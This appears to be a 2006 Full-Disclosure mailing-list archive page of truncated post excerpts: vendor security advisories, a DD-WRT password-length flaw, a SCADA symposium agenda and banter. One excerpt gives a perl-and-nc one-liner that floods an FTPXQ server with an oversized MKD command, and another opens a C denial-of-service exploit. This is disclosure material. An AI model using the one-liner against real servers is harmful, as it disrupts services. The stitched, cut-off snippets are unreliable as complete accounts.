Raj Mathur wrote:
On Wednesday 25 October 2006 23:14, cardoso wrote:
Exactly. A few years ago I used to deal with linux fanboys showing
them the cute trick of linux single at boot time. After a few
hours begging for the admin password, I teached the trick and they
usually stopped the brag
rPath Security Advisory: 2006-0198-1
Published: 2006-10-26
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
screen=/[EMAIL PROTECTED]:devel//1/4.0.3-0.1-1
References:
rPath Security Advisory: 2006-0195-2
Published: 2006-10-18
Updated:
2006-10-26 Integer overflow now fixed in Qt library
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
kdelibs=/[EMAIL
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Wed, 25 Oct 2006 04:30:18 -0500 Gadi Evron [EMAIL PROTECTED]
wrote:
Does anyone have more information on this issue?
Yes. SecuriTeam is currently assisting a researcher with reporting
this
issue to Yahoo! security.
Yahoo! security responded
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Tue, 24 Oct 2006 10:52:58 -0500 Gadi Evron [EMAIL PROTECTED]
wrote:
So, what I am going to talk about... A tad bit of history on
vulnerabilities and their use on the Internet, and then, what we
are going
to see on corporate, ISP and Internet
On Thu, 26 Oct 2006 [EMAIL PROTECTED] wrote:
So how fast is this record time? As fast as Hitler's Blitzkrieg
tactics? That's pretty fast!
Yahoo! released a fixed version.
Gadi.
___
Full-Disclosure - We believe in it.
Charter:
S4: SCADA Security Scientific Symposium
Kovens Conference Center
3000 N.E. 151st Street
Miami, FL 33181
Wednesday, Jan. 24, 2007 - Thursday, Jan. 25, 2007
8:30 AM - 5:00 PM
A unique 2-day symposium with technical presentations on SCADA security
research.
Wednesday, January 24th
Session 1:
So I stick to my personal opinion of the great man -
1. One person
2. Good intentions overall
3. Not great communication skills (depends how drunk he is)
4. Too paranoid for his own good
5. Living in Ediburgh
6. Most likely Scottish
ok despite everything (assuming he isnt suffering from
Hello,
And here's the bash/perl port:
[EMAIL PROTECTED] ~ $ perl -e print USER lol\r\nPASS lol\r\nMKD
.(Ax255).\r\n | nc www.victim.com 21
Cheers,
Bernhard
Federico Fazzi wrote:
/*
* 0xf_ftpxq.c - FTPXQ Denial of service exploit.
* Federico Fazzi [EMAIL PROTECTED]
*
* advisory by Eric
Hello,
I found various integer overflows that can be triggered from remote in a
product but all of these appears to be unexploitables by common ways.
The product is a closed source one so I do not have the source code to
audit it.
Any tip about when an integer overflow can be determined as non
Multiple Vendor wvWare LFO Count Integer Overflow Vulnerability
iDefense Security Advisory 10.26.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 26, 2006
I. BACKGROUND
The WV library provides an interface to facilitate access to binary file
format Microsoft Word documents. The
Multiple Vendor wvWare LVL Count Integer Overflow Vulnerability
iDefense Security Advisory 10.26.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 26, 2006
I. BACKGROUND
The WV library provides an interface to facilitate access to binary file
format Microsoft Word documents. The
Hi,
Does anyone noticed that to authenticate in any wireless router running DD-WRT firmware (lastest version), it only check the first 8 characters of the password???
E.g. you can set the root password to [EMAIL PROTECTED] and when you try to authenticate with [EMAIL PROTECTED]... got root!
Some
ZDI-06-035: Novell eDirectory NDS Server Host Header Buffer
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-035.html
October 26, 2006
-- CVE ID:
CVE-2006-5478
-- Affected Vendor:
Novell
-- Affected Products:
Novell eDirectory 8.8.1
-- TippingPoint(TM) IPS
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200610-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
15 matches
Mail list logo